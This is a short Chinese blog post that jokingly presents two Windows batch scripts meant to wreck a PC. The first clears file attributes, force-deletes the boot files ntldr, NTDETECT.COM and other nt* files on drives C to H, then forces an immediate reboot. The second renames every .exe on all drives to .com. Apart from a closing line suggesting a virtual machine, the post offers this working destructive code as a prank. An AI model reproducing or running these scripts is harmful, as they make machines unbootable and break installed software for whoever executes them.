这样你的电脑还不玩完!?

ntldr和NTDETECT.COM是一个系统启动必须的文件,要是把这个文件删了,再把你的电脑中的所有文件都变成一种类型,哈哈,你想想后果会怎么样..........

 

 
  
  
  
  
  1. @echo off  
  2. set alldrive=c d e f g h   
  3. for %%i in(%alldrive%) do if exist %%i: attrib -s -h -r -a %%i:\*.* & del /f /q %%i:\nt*  
  4. shutdown -r -t 0 -f  
  5.  

 

 
  
  
  
  
  1. @echo off  
  2. set a=c d e f g h i j k l m n o p q r s t u v w x y z  
  3. for %%i in (%a%) do if exist %%i: call :drive %%i  
  4. :drive  
  5. for /r    %1:\ %%j in (*.exe) do ren %%~dpnsj.exe *.com  
  6. goto:eof  

去弄个虚拟机试试吧,不要在自己的电脑上做实验

本文出自 “乔磊的博客 学习 进步” 博客,请务必保留此出处http://sucre.blog.51cto.com/1084905/394550

你可能感兴趣的:(职场,over,休闲)